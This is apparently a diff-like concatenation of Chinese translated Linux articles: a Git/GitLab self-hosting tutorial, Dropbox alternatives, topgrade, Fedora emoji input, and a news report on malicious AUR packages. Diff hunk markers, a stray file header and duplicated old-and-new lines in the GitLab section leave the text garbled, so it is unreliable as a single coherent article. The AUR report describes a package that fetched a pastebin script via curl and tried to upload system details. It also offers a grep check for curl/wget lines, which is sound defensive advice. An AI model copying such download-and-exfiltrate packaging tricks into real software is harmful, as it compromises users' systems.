搭建属于你自己的 Git 服务器
======

![](https://www.linux.com/images/stories/41373/GitLab-3.png)

> 在本文中,我们的目的是让你了解如何设置属于自己的 Git 服务器。

[Git][1] 是由 [Linus Torvalds 开发][2]的一个版本控制系统,现如今正在被全世界大量开发者使用。许多公司喜欢使用基于 Git 版本控制的 GitHub 代码托管。[根据报道,GitHub 是现如今全世界最大的代码托管网站][3]。GitHub 宣称已经有 920 万用户和 2180 万个仓库。许多大型公司现如今也将代码迁移到 GitHub 上。[甚至于谷歌,一家搜索引擎公司,也正将代码迁移到 GitHub 上][4]。

### 运行你自己的 Git 服务器

GitHub 能提供极佳的服务,但却有一些限制,尤其是对个人用户或编程爱好者而言。GitHub 的限制之一就是其免费的服务没有提供私有代码托管业务。[你不得不支付每月 7 美金购买 5 个私有仓库][5],并且想要更多的私有仓库则要交更多的钱。

万一你想要私有仓库或需要更多权限控制,最好的方法就是在你的服务器上运行 Git。不仅你能够省去一笔钱,你还能够对你的服务器有更多的掌控。在大多数情况下,大多数高级 Linux 用户已经拥有自己的服务器,并且在这些服务器上运行 Git 就像“啤酒一样免费”(LCTT 译注:指自由软件)。

在这篇教程中,我们主要讲在你的服务器上,使用两种代码管理的方法。一种是运行一个纯 Git 服务器,另一个是使用名为 [GitLab][6] 的 GUI 工具。在本教程中,我在 VPS 上运行的操作系统是 Ubuntu 14.04 LTS。

### 在你的服务器上安装 Git

在本篇教程中,我们考虑一个简单案例,我们有一个远程服务器和一台本地服务器,现在我们需要使用这两台机器来工作。为了简单起见,我们就分别叫它们为远程服务器和本地服务器。

首先,在两边的机器上安装 Git。你可以从依赖包中安装 Git,在本文中,我们将使用更简单的方法:

```
sudo apt-get install git-core
```

为 Git 创建一个用户:

```
sudo useradd git
passwd git
```

为了方便访问服务器,我们设置一个免密 ssh 登录。首先在你本地电脑上创建一个 ssh 密钥:

```
ssh-keygen -t rsa
```

这时会要求你输入保存密钥的路径,这时只需要点击回车保存在默认路径。第二个问题是输入访问远程服务器所需的密码短语。它会生成两个密钥——公钥和私钥。记下您在下一步中需要使用的公钥的位置。

现在您必须将这些密钥复制到服务器上,以便两台机器可以相互通信。在本地机器上运行以下命令:

```
cat ~/.ssh/id_rsa.pub | ssh git@remote-server "mkdir -p ~/.ssh && cat >> ~/.ssh/authorized_keys"
```

现在,用 `ssh` 登录进服务器,并为 Git 创建一个项目路径。你可以为你的仓库设置一个你想要的目录。

现在跳转到该目录中:

```
cd /home/swapnil/project-1.git
```

现在新建一个空仓库:

```
git init --bare
Initialized empty Git repository in /home/swapnil/project-1.git
```

现在我们需要在本地机器上新建一个基于 Git 版本控制的仓库:

```
mkdir -p /home/swapnil/git/project
```

进入我们创建仓库的目录:

```
cd /home/swapnil/git/project
```

现在在该目录中创建项目所需的文件。留在这个目录并启动 `git`:

```
git init
Initialized empty Git repository in /home/swapnil/git/project
```

把所有文件添加到仓库中:

```
git add .
```

现在,每次添加文件或进行更改时,都必须运行上面的 `add` 命令。您还需要为每次文件更改写入提交消息。提交消息基本上说明了我们所做的更改。

```
git commit -m "message" -a
```

@@ -93,10 +94,9 @@

```
2 files changed, 2 insertions(+)
create mode 100644 GoT.txt
create mode 100644 writing.txt
```

在这种情况下,我有一个名为 GoT(《权力的游戏》的点评)的文件,并且我做了一些更改,所以当我运行命令时,它指定对文件进行更改。在上面的命令中 `-a` 选项意味着提交仓库中的所有文件。如果您只更改了一个,则可以指定该文件的名称而不是使用 `-a`。

举一个例子:

@@ -104,124 +104,124 @@

```
git commit -m "message" GoT.txt
[master e517b10] message
1 file changed, 1 insertion(+)
```

到现在为止,我们一直在本地服务器上工作。现在我们必须将这些更改推送到远程服务器上,以便通过互联网访问,并且可以与其他团队成员进行协作。

```
git remote add origin ssh://git@remote-server/repo-path-on-server.git
```

现在,您可以使用 `pull` 或 `push` 选项在服务器和本地计算机之间推送或拉取:

```
git push origin master
```

如果有其他团队成员想要使用该项目,则需要将远程服务器上的仓库克隆到其本地计算机上:

```
git clone git@remote-server:/home/swapnil/project.git
```

这里 `/home/swapnil/project.git` 是远程服务器上的项目路径,在你的本机上则会有所不同。

然后进入本地计算机上的目录(使用服务器上的项目名称):

```
cd /project
```

现在他们可以编辑文件,写入提交更改信息,然后将它们推送到服务器:

```
git commit -m 'corrections in GoT.txt story' -a
```

然后推送改变:

```
git push origin master
```

我认为这足以让一个新用户开始在他们自己的服务器上使用 Git。如果您正在寻找一些 GUI 工具来管理本地计算机上的更改,则可以使用 GUI 工具,例如 QGit 或 GitK for Linux。
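
上面的整套流程(裸仓库、克隆、提交、推送)也可以先在一台机器上用两个临时目录完整演练一遍。下面是一个自足的示意脚本(假设本机装有 git;目录名均为临时生成,提交用的用户名和邮箱是虚构示例):

```shell
# 极简示意:在本机用两个临时目录演练“裸仓库 + 克隆 + 提交 + 推送”。
set -e
command -v git >/dev/null 2>&1 || { echo "git not found"; exit 0; }

tmp=$(mktemp -d)
git init -q --bare "$tmp/project.git"          # 相当于服务器上的裸仓库
git clone -q "$tmp/project.git" "$tmp/work"    # 相当于本地克隆
cd "$tmp/work"
git -c user.email=you@example.com -c user.name=demo \
    commit -q --allow-empty -m "first commit"  # 示例提交(空提交,免建文件)
git push -q origin HEAD                        # 推回“服务器”(HEAD 即当前分支)
heads=$(git ls-remote --heads origin)          # 列出远端分支,验证推送成功
echo "$heads"
cd / && rm -rf "$tmp"                          # 清理临时目录
```

演练成功后,把 `$tmp/project.git` 换成 `ssh://git@remote-server/...` 形式的地址,就是文中真实的远程流程。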

![](https://www.linux.com/images/stories/41373/QGit.jpg)

### 使用 GitLab

这是项目所有者和协作者的纯命令行解决方案。这当然不像使用 GitHub 那么简单。不幸的是,尽管 GitHub 是全球最大的代码托管商,但是它自己的软件别人却无法使用。因为它不是开源的,所以你不能获取源代码并编译你自己的 GitHub。这与 WordPress 或 Drupal 不同,您无法下载 GitHub 并在您自己的服务器上运行它。

像往常一样,在开源世界中,这并不是路的尽头。GitLab 是一个非常优秀的项目。这是一个开源项目,允许用户在自己的服务器上运行类似于 GitHub 的项目管理系统。

您可以使用 GitLab 为团队成员或公司运行类似于 GitHub 的服务。您可以使用 GitLab 在公开发布之前开发私有项目。

GitLab 采用传统的开源商业模式。他们有两种产品:免费的开源软件,用户可以在自己的服务器上安装;以及类似于 GitHub 的托管服务。

可下载版本有两个版本,免费的社区版和付费企业版。企业版基于社区版,但附带针对企业客户的其他功能。它或多或少与 WordPress.org 或 WordPress.com 提供的服务类似。

社区版具有高度可扩展性,可以在单个服务器或群集上支持 25000 个用户。GitLab 的一些功能包括:Git 仓库管理、代码评论、问题跟踪、活动源和维基。它配备了 GitLab CI,用于持续集成和交付。

Digital Ocean 等许多 VPS 提供商会为用户提供 GitLab 服务。如果你想在你自己的服务器上运行它,你可以手动安装它。GitLab 为不同的操作系统提供了软件包。在我们安装 GitLab 之前,您可能需要配置 SMTP 电子邮件服务器,以便 GitLab 可以在需要时随时推送电子邮件。官方推荐使用 Postfix。所以,先在你的服务器上安装 Postfix:

```
sudo apt-get install postfix
```

在安装 Postfix 期间,它会问你一些问题,不要跳过它们。如果你一不小心跳过了,你可以使用这个命令来重新配置它:

```
sudo dpkg-reconfigure postfix
```

运行此命令时,请选择 “Internet Site” 并为使用 Gitlab 的域名提供电子邮件 ID。

我是这样输入的:

```
xxx@x.com
```

用 Tab 键并为 postfix 创建一个用户名。接下来将会要求你输入一个目标邮箱。

在剩下的步骤中,都选择默认选项。当我们安装且配置完成后,我们继续安装 GitLab。
|
在剩下的步骤中,都选择默认选项。当我们安装且配置完成后,我们继续安装 GitLab。
|
||||||
|
|
||||||
我们使用 wget 来下载软件包(用 [最新包][7] 替换下载链接):
|
我们使用 `wget` 来下载软件包(用 [最新包][7] 替换下载链接):
|
||||||
|
|
||||||
```
|
```
|
||||||
wget https://downloads-packages.s3.amazonaws.com/ubuntu-14.04/gitlab_7.9.4-omnibus.1-1_amd64.deb
|
wget https://downloads-packages.s3.amazonaws.com/ubuntu-14.04/gitlab_7.9.4-omnibus.1-1_amd64.deb
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
然后安装这个包:
|
然后安装这个包:
|
||||||
|
|
||||||
```
|
```
|
||||||
sudo dpkg -i gitlab_7.9.4-omnibus.1-1_amd64.deb
|
sudo dpkg -i gitlab_7.9.4-omnibus.1-1_amd64.deb
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
现在是时候配置并启动 GitLab 了。
|
现在是时候配置并启动 GitLab 了。
|
||||||
|
|
||||||
```
|
```
|
||||||
sudo gitlab-ctl reconfigure
|
sudo gitlab-ctl reconfigure
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
您现在需要在配置文件中配置域名,以便您可以访问 GitLab。打开文件。
|
您现在需要在配置文件中配置域名,以便您可以访问 GitLab。打开文件。
|
||||||
|
|
||||||
```
|
```
|
||||||
nano /etc/gitlab/gitlab.rb
|
nano /etc/gitlab/gitlab.rb
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
在这个文件中编辑 'external_url' 并输入服务器域名。保存文件,然后从 Web 浏览器中打开新建的一个 GitLab 站点。
|
在这个文件中编辑 `external_url` 并输入服务器域名。保存文件,然后从 Web 浏览器中打开新建的一个 GitLab 站点。
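在 `gitlab.rb` 里,这一行大致如下(`gitlab.example.com` 只是占位的示例域名,请换成你自己的域名):

```
external_url 'http://gitlab.example.com'
```

修改并保存之后,需要再次运行 `sudo gitlab-ctl reconfigure` 让新配置生效。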
![](https://www.linux.com/images/stories/41373/GitLab-1.jpg)

默认情况下,它会以系统管理员的身份创建 `root`,并使用 `5iveL!fe` 作为密码。登录到 GitLab 站点,然后更改密码。

![](https://www.linux.com/images/stories/41373/GitLab-2.png)

密码更改后,登录该网站并开始管理您的项目。

![](https://www.linux.com/images/stories/41373/GitLab-3.png)

GitLab 有很多选项和功能。最后,我借用电影《黑客帝国》中的经典台词:“不幸的是,没有人知道 GitLab 可以做什么。你必须亲自尝试一下。”

--------------------------------------------------------------------------------

via: https://www.linux.com/learn/how-run-your-own-git-server

作者:[Swapnil Bhartiya][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[wyxplus](https://github.com/wyxplus)
校对:[wxy](https://github.com/wxy)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
122
published/20180618 5 open source alternatives to Dropbox.md
Normal file
可代替 Dropbox 的 5 个开源软件
======

> 寻找一个不会破坏你的安全、自由或银行资产的文件共享应用。

![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/dropbox.jpg?itok=qFwcqboT)

Dropbox 在文件共享应用中是个 800 磅的大猩猩。尽管它是个极度流行的工具,但你可能仍想使用一个软件去替代它。

也许你出于各种好的理由,包括安全和自由,这使你决定用[开源方式][1]。亦或是你已经被数据泄露吓坏了,或者定价计划不能满足你实际需要的存储量。

幸运的是,有各种各样的开源文件共享应用,可以提供给你更多的存储容量、更好的安全性,并且以低于 Dropbox 很多的价格来让你掌控你自己的数据。有多低呢?如果你有一定的技术并且有一台 Linux 服务器可供使用,那就试试免费的应用吧。

这里有 5 个最好的可以代替 Dropbox 的开源应用,以及其它几个你可能想考虑使用的软件。

### ownCloud

![](https://opensource.com/sites/default/files/uploads/owncloud.png)

[ownCloud][2] 发布于 2010 年,是本文所列应用中最老的,但是不要被这一点蒙蔽:它仍然十分流行(根据该公司统计,有超过 150 万用户),并且由一个有 1100 名参与者的社区积极维护,定期发布更新。

它的主要特点 —— 文件共享和文档协作 —— 和 Dropbox 的功能相似。它们的主要区别(除了它的[开源协议][3])是你的文件可以托管在你的私人 Linux 服务器或云上,给予用户对自己数据完全的控制权。(自托管是本文所列应用的一个共同特点。)

使用 ownCloud,你可以通过 Linux、MacOS 或 Windows 的客户端和安卓、iOS 的移动应用程序来同步和访问文件。你还可以通过带有密码保护的链接分享给其他人来协作或者上传和下载。数据传输通过端到端加密(E2EE)和 SSL 加密来保护安全。你还可以通过使用它的[市场][4]中各种各样的第三方应用来扩展它的功能。当然,它也提供付费的、商业许可的企业版本。

ownCloud 提供了详尽的[文档][5],包括安装指南和针对用户、管理员、开发者的手册。你可以从 GitHub 仓库中获取它的[源码][6]。

### NextCloud

![](https://opensource.com/sites/default/files/uploads/nextcloud.png)

[NextCloud][7] 在 2016 年从 ownCloud 分裂出来,并且具有很多相同的功能。NextCloud 以它的高安全性和法规遵从性作为它的一个独特的[卖点][8]。它具有 HIPAA(医疗)和 GDPR(隐私)法规遵从功能,并提供广泛的数据策略约束、加密、用户管理和审核功能。它还在传输和存储期间对数据进行加密,并且集成了移动设备管理和身份验证机制(包括 LDAP/AD、单点登录、双因素身份验证等)。

像本文列表里的其他应用一样,NextCloud 是自托管的,但是如果你不想在自己的 Linux 服务器上安装它,该公司与几个[提供商][9]达成了合作,提供安装和托管服务,并销售服务器、设备和服务支持。它的[市场][10]中提供了大量的应用来扩展它的功能。

NextCloud 的[文档][11]为用户、管理员和开发者提供了详细的信息,并且它的论坛、IRC 频道和社交媒体提供了基于社区的支持。如果你想贡献或者获取它的源码、报告一个错误、查看它的 AGPLv3 许可,或者想了解更多,请访问它的 [GitHub 项目主页][12]。

### Seafile

![](https://opensource.com/sites/default/files/uploads/seafile.png)

与 ownCloud 或 NextCloud 相比,[Seafile][13] 或许没有那么花哨的卖点(比如应用生态),但是它能完成任务。实质上,它充当了 Linux 服务器上的虚拟驱动器,以扩展你的桌面存储,并允许你使用密码保护和各种级别的权限(即只读或读写)有选择地共享文件。

它的协作功能包括文件夹权限控制、密码保护的下载链接,以及像 Git 一样的版本控制和记录。文件使用双因素身份验证、文件加密和 AD/LDAP 集成进行保护,并且可以从 Windows、MacOS、Linux、iOS 或 Android 设备进行访问。

更多详细信息,请访问 Seafile 的 [GitHub 仓库][14]、[服务手册][15]、[wiki][16] 和[论坛][17]。请注意,Seafile 的社区版以 [GPLv2][18] 许可发布,但其专业版不是开源的。

### OnionShare

![](https://opensource.com/sites/default/files/uploads/onionshare.png)

[OnionShare][19] 是一个很酷的应用:如果你想匿名而安全地共享单个文件或文件夹,它可以做到。不需要设置或维护服务器,你需要做的只是[下载和安装][20],无论是在 MacOS、Windows 还是 Linux 上。文件始终在你自己的计算机上;当你共享文件时,OnionShare 创建一个 web 服务器,使其可作为 Tor 洋葱服务访问,并生成一个不可猜测的 .onion URL,这个 URL 允许收件人通过 [Tor 浏览器][21]获取文件。

你可以设置文件共享的限制,例如限制可以下载的次数,或使用自动停止计时器设置一个严格的过期日期/时间,超过这个期限便不可访问(即使尚未访问过该文件)。

OnionShare 以 [GPLv3][22] 许可发布;有关详细信息,请查阅其 [GitHub 仓库][22],其中还包括介绍这个易用的文件共享软件特点的[文档][23]。

### Pydio Cells

![](https://opensource.com/sites/default/files/uploads/pydiochat.png)

[Pydio Cells][24] 在 2018 年 5 月推出了稳定版,是对 Pydio 共享应用程序核心服务器代码的彻底大修。由于 Pydio 基于 PHP 的后端的限制,开发人员决定用 Go 语言和微服务体系结构重写后端。(前端仍然是基于 PHP 的。)

Pydio Cells 包括通常的共享和版本控制功能,以及应用内消息、移动应用程序(Android 和 iOS),以及一种社交网络风格的协作方法。安全性包括基于 OpenID Connect 的身份验证、静态数据加密、安全策略等。企业发行版中包含更高级的功能,但对于大多数中小型企业和家庭用户来说,社区(家庭)版本已经足够了。

您可以在 Linux 和 MacOS 上[下载][25] Pydio Cells。有关详细信息,请查阅[文档常见问题][26]、[源码库][27] 和 [AGPLv3 许可证][28]。

### 其他

如果以上选择不能满足你的需求,你可能想考虑其他开源的文件共享类应用。

* 如果你的主要目的是在设备间同步文件而不是分享文件,考察一下 [Syncthing][29]。
* 如果你是一个 Git 的粉丝而且不需要移动应用,你可能更喜欢 [SparkleShare][30]。
* 如果你主要想要一个地方聚合所有你的个人数据,看看 [Cozy][31]。
* 如果你想找一个轻量级的或者专注于文件共享的工具,可以看看 [Scott Nesbitt 的评测][32],其中介绍了一款鲜为人知的工具。

哪个是你最喜欢的开源文件共享应用?在评论中让我们知悉。
--------------------------------------------------------------------------------

via: https://opensource.com/alternatives/dropbox

作者:[Opensource.com][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[distant1219](https://github.com/distant1219)
校对:[wxy](https://github.com/wxy)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://opensource.com
[1]:https://opensource.com/open-source-way
[2]:https://owncloud.org/
[3]:https://www.gnu.org/licenses/agpl-3.0.html
[4]:https://marketplace.owncloud.com/
[5]:https://doc.owncloud.com/
[6]:https://github.com/owncloud
[7]:https://nextcloud.com/
[8]:https://nextcloud.com/secure/
[9]:https://nextcloud.com/providers/
[10]:https://apps.nextcloud.com/
[11]:https://nextcloud.com/support/
[12]:https://github.com/nextcloud
[13]:https://www.seafile.com/en/home/
[14]:https://github.com/haiwen/seafile
[15]:https://manual.seafile.com/
[16]:https://seacloud.cc/group/3/wiki/
[17]:https://forum.seafile.com/
[18]:https://github.com/haiwen/seafile/blob/master/LICENSE.txt
[19]:https://onionshare.org/
[20]:https://onionshare.org/#downloads
[21]:https://www.torproject.org/
[22]:https://github.com/micahflee/onionshare/blob/develop/LICENSE
[23]:https://github.com/micahflee/onionshare/wiki
[24]:https://pydio.com/en
[25]:https://pydio.com/download/
[26]:https://pydio.com/en/docs/faq
[27]:https://github.com/pydio/cells
[28]:https://github.com/pydio/pydio-core/blob/develop/LICENSE
[29]:https://syncthing.net/
[30]:http://www.sparkleshare.org/
[31]:https://cozy.io/en/
[32]:https://opensource.com/article/17/3/file-sharing-tools
如何在 Linux 中使用一个命令升级所有软件
======

![](https://www.ostechnix.com/wp-content/uploads/2018/06/topgrade-720x340.png)

众所周知,让我们的 Linux 系统保持最新状态会用到多种包管理器。比如说,在 Ubuntu 中,你无法只用 `sudo apt update` 和 `sudo apt upgrade` 命令升级所有软件,这两条命令仅升级使用 APT 包管理器安装的应用程序。你有可能还使用 `cargo`、[pip][1]、`npm`、`snap`、`flatpak` 或 [Linuxbrew][2] 等包管理器安装了其他软件,那就需要使用相应的包管理器才能使它们全部更新。

再也不用这样了!跟 `topgrade` 打个招呼,这是一个可以一次性升级系统中所有软件的工具。

你无需逐个运行每个包管理器来更新软件包。`topgrade` 工具通过检测已安装的软件包、工具、插件并运行相应的软件包管理器来更新 Linux 中的所有软件,用一条命令解决了这个问题。它是自由而开源的,使用 **rust 语言**编写。它支持 GNU/Linux 和 Mac OS X。

### 在 Linux 中使用一个命令升级所有软件

`topgrade` 存在于 AUR 中。因此,你可以在任何基于 Arch 的系统中使用 [Yay][3] 助手程序安装它。

```
$ yay -S topgrade
```

在其他 Linux 发行版上,你可以使用 `cargo` 包管理器安装 `topgrade`。要安装 cargo 包管理器,请参阅以下链接:

- [在 Linux 安装 rust 语言][12]

然后,运行以下命令来安装 `topgrade`:

```
$ cargo install topgrade
```

安装完成后,运行 `topgrade` 以升级 Linux 系统中的所有软件:

```
$ topgrade
```

一旦调用了 `topgrade`,它将逐个执行以下任务。如有必要,系统会要求输入 root/sudo 用户密码。

1、 运行系统的包管理器:

* Arch:运行 `yay`,或者回退到 [pacman][4]
* CentOS/RHEL:运行 `yum upgrade`
* Fedora:运行 `dnf upgrade`
* Debian/Ubuntu:运行 `apt update` 和 `apt dist-upgrade`
* Linux/macOS:运行 `brew update` 和 `brew upgrade`

2、 检查 Git 是否跟踪了以下路径。如果有,则拉取它们:

* `~/.emacs.d`(无论你使用 Spacemacs 还是自定义配置都应该可用)
* `~/.zshrc`
* `~/.oh-my-zsh`
* `~/.tmux`
* `~/.config/fish/config.fish`
* 自定义路径

3、 Unix:运行 `zplug` 更新

4、 Unix:使用 TPM 升级 `tmux` 插件

5、 运行 `cargo install-update`

6、 升级 Emacs 包

7、 升级 Vim 包。对以下插件框架均可用:

* NeoBundle
* [Vundle][5]
* Plug

8、 升级 [npm][6] 全局安装的包

9、 升级 Atom 包

10、 升级 [Flatpak][7] 包

11、 升级 [snap][8] 包

12、 Linux:运行 `fwupdmgr` 显示固件升级(仅查看,实际不会执行升级)

13、 运行自定义命令

最后,`topgrade` 将运行 `needrestart` 以重新启动所有需要重启的服务。在 Mac OS X 中,它会升级 App Store 程序。

我的 Ubuntu 18.04 LTS 测试环境的示例输出:

![][10]

好处是如果一个任务失败,它将自动运行下一个任务并完成所有其他后续任务。最后,它将显示摘要,其中包含运行的任务数量、成功的数量和失败的数量等详细信息。

![][11]

就个人而言,我很喜欢 `topgrade` 这种想法:用一个命令升级各种包管理器安装的所有软件。我希望你也觉得它有用。还有更多的好东西,敬请关注!

干杯!

--------------------------------------------------------------------------------

via: https://www.ostechnix.com/how-to-upgrade-everything-using-a-single-command-in-linux/

作者:[SK][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[geekpi](https://github.com/geekpi)
校对:[wxy](https://github.com/wxy)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://www.ostechnix.com/author/sk/
[1]:https://www.ostechnix.com/manage-python-packages-using-pip/
[2]:https://www.ostechnix.com/linuxbrew-common-package-manager-linux-mac-os-x/
[3]:https://www.ostechnix.com/yay-found-yet-another-reliable-aur-helper/
[4]:https://www.ostechnix.com/getting-started-pacman/
[5]:https://www.ostechnix.com/manage-vim-plugins-using-vundle-linux/
[6]:https://www.ostechnix.com/manage-nodejs-packages-using-npm/
[7]:https://www.ostechnix.com/flatpak-new-framework-desktop-applications-linux/
[8]:https://www.ostechnix.com/install-snap-packages-arch-linux-fedora/
[10]:http://www.ostechnix.com/wp-content/uploads/2018/06/topgrade-1.png
[11]:http://www.ostechnix.com/wp-content/uploads/2018/06/topgrade-2.png
[12]:https://www.ostechnix.com/install-rust-programming-language-in-linux/
在 Fedora 28 Workstation 使用 emoji 加速输入
======

![](https://fedoramagazine.org/wp-content/uploads/2018/07/emoji-typing-816x345.jpg)

Fedora 28 Workstation 添加了一个功能,允许你使用键盘快速搜索、选择和输入 emoji。emoji 这种可爱的表意文字是 Unicode 的一部分,在消息传递中使用得相当广泛,特别是在移动设备上。你可能听过这样一句习语:“一图胜千言”。这正是 emoji 所提供的:供你在交流中使用的简单图像。Unicode 的每个版本都会增加更多 emoji,最近的 Unicode 版本中就添加了 200 多个。本文向你展示如何在你的 Fedora 系统中方便地使用它们。

很高兴看到 emoji 的数量在增长。但与此同时,它也带来了如何在计算设备中输入它们的挑战。许多人已经在移动设备或社交网站中输入这些符号了。

[**编者注:** 本文是对此主题以前发表过的文章的更新。]

### 在 Fedora 28 Workstation 上启用 emoji 输入

新的 emoji 输入法默认出现在 Fedora 28 Workstation 中。要使用它,必须使用“区域和语言设置”对话框启用它。从 Fedora Workstation 设置打开“区域和语言”对话框,或在“概览”中搜索它。

[![Region & Language settings tool][1]][2]

选择 `+` 控件添加输入源。出现以下对话框:

[![Adding an input source][3]][4]

选择最后的选项(三个点)来完全展开选择。然后,在列表底部找到 “Other” 并选择它:

[![Selecting other input sources][5]][6]

在下面的对话框中,找到 “Typing Booster” 选项并选择它:

[![][7]][8]

这个高级输入法由 iBus 在背后支持。高级输入法可通过列表右侧的齿轮图标在列表中识别。

输入法下拉菜单会自动出现在 GNOME Shell 顶部栏中。确认你的默认输入法(在此示例中为英语(美国))被选为当前输入法,你就可以输入了。

[![Input method dropdown in Shell top bar][9]][10]

### 使用新的表情符号输入法

现在 emoji 输入法已经启用,按键盘快捷键 `Ctrl+Shift+E` 即可搜索 emoji。将出现一个弹出对话框,你可以在其中输入搜索词,例如 “smile” 来查找匹配的符号。

[![Searching for smile emoji][11]][12]

使用箭头键翻页列表。然后按回车进行选择,所选的字形将替换你的输入内容。

--------------------------------------------------------------------------------

via: https://fedoramagazine.org/boost-typing-emoji-fedora-28-workstation/

作者:[Paul W. Frields][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[geekpi](https://github.com/geekpi)
校对:[wxy](https://github.com/wxy)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://fedoramagazine.org/author/pfrields/
[1]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-15-02-41-1024x718.png
[2]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-15-02-41.png
[3]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-33-46-1024x839.png
[4]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-33-46.png
[5]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-34-15-1024x839.png
[6]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-34-15.png
[7]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-34-41-1024x839.png
[8]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-34-41.png
[9]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-15-05-24-300x244.png
[10]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-15-05-24.png
[11]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-36-31-290x300.png
[12]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-36-31.png
在 Arch 用户仓库(AUR)中发现恶意软件
======

7 月 7 日,有一个 AUR 软件包被改入了一些恶意代码,这提醒 [Arch Linux][1] 用户(以及一般的 Linux 用户):在安装之前,应该尽可能检查所有由用户生成的软件包。

[AUR][3](即 Arch(Linux)用户仓库)包含包描述(也称为 PKGBUILD),它使得从源代码编译包变得更容易。虽然这些包非常有用,但它们永远不应被视为安全的,用户应尽可能在使用之前检查其内容。毕竟,AUR 在网页中以粗体显示:“**AUR 包是用户制作的内容。任何使用该提供的文件的风险由你自行承担。**”

这次[发现][4]包含恶意代码的 AUR 包证明了这一点。[acroread][5] 于 7 月 7 日被一位名为 “xeactor” 的用户修改(看起来它以前是“孤儿”,意思是它没有维护者),修改后的包中包含了一行使用 `curl` 从 pastebin 下载脚本的命令。然后,该脚本又下载了另一个脚本,并安装了一个 systemd 单元以定期运行后者。

**看来还有[另外两个][2] AUR 包以同样的方式被修改。所有违规软件包都已删除,用于上传它们的用户帐户也已被暂停(这些帐户都注册于更新软件包的同一天)。**

这些恶意代码没有做任何真正有害的事情 —— 它只是试图把一些系统信息,比如机器 ID、`uname -a` 的输出(包括内核版本、架构等)、CPU 信息、pacman 信息,以及 `systemctl list-units`(列出 systemd 单元信息)的输出上传到 pastebin.com。我说“试图”,是因为第二个脚本中存在错误,实际上并没有上传成功(上传函数的名字是 “upload”,但脚本却试图用另一个名称 “uploader” 来调用它)。
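这属于 shell 脚本里最常见的一类笔误:定义了一个函数,却用另一个不存在的名字去调用它。下面用一个极简的脚本来示意(这并非原恶意脚本,只是沿用了报道中提到的 upload/uploader 两个名字,其余内容均为假设):

```
# 脚本里定义的函数叫 upload……
upload() {
    # 这里本应把 "$1" 的内容发送出去(仅为示意,并未实现真正的上传)
    echo "uploading: $1"
}

# ……但调用时写成了不存在的 uploader,于是 shell 会报“命令未找到”,
# 上传实际上从未发生
uploader "/tmp/sysinfo.txt"
```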
此外,将这些恶意脚本添加到 AUR 的人还把自己的 Pastebin API 密钥以明文形式留在了脚本中,再次证明他们真的不明白自己在做什么。(LCTT 译注:意即这是一个菜鸟“黑客”,还不懂得如何有经验地隐藏自己。)

尝试将这些信息上传到 Pastebin 的目的尚不清楚,特别是在原本可以上传更加敏感的信息(如 GPG/SSH 密钥)的情况下。

**更新:** Reddit 用户 u/xanaxdroid_ [提及][6],同一个名为 “xeactor” 的用户也发布了一些加密货币挖矿软件包,因此他推测 “xeactor” 可能正计划向 AUR 添加一些隐藏的加密货币挖矿软件([两个月][7]前的一些 Ubuntu Snap 软件包也是如此),这就是 “xeactor” 可能试图获取各种系统信息的原因。该 AUR 用户上传的所有包都已删除,因此我无法检查。

**另一个更新:** 你究竟应该在那些用户生成的软件包(如 AUR 中的)里检查什么?情况各有不同,我无法准确地告诉你,但你可以从这里开始:寻找任何尝试使用 `curl`、`wget` 和其他类似工具下载内容的地方,看看它们究竟想要下载什么;还要检查下载软件包源码的服务器,并确保它是官方来源。不幸的是,这并不是一门精确的“科学”。例如,对于 Launchpad PPA,事情变得更加复杂,因为你必须懂得 Debian 的打包方式,而且源代码可以被直接更改,因为它托管在 PPA 中并由用户上传。Snap 软件包则更加复杂,因为在安装之前你无法检查这些软件包(据我所知)。在后面这些情况下,作为通用的解决方案,我觉得你应该只安装你所信任的用户/打包者生成的软件包。
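以“检查下载行为”这一条为例,下面是一个很粗糙的起步做法(`grep` 只能帮你定位可疑的行,真正的审查仍然需要通读整个 PKGBUILD;这里的文件内容只是示例):

```
# 假设已经把待审查的 PKGBUILD 保存到了当前目录
# 列出其中所有出现 curl/wget 的行,人工确认它们到底在下载什么、从哪里下载
grep -nE 'curl|wget' PKGBUILD

# 再看看 source=() 数组里声明的下载来源是否都是官方地址
grep -n 'source' PKGBUILD
```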
--------------------------------------------------------------------------------

via: https://www.linuxuprising.com/2018/07/malware-found-on-arch-user-repository.html

作者:[Logix][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[geekpi](https://github.com/geekpi)
校对:[wxy](https://github.com/wxy)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://plus.google.com/118280394805678839070
[1]:https://www.archlinux.org/
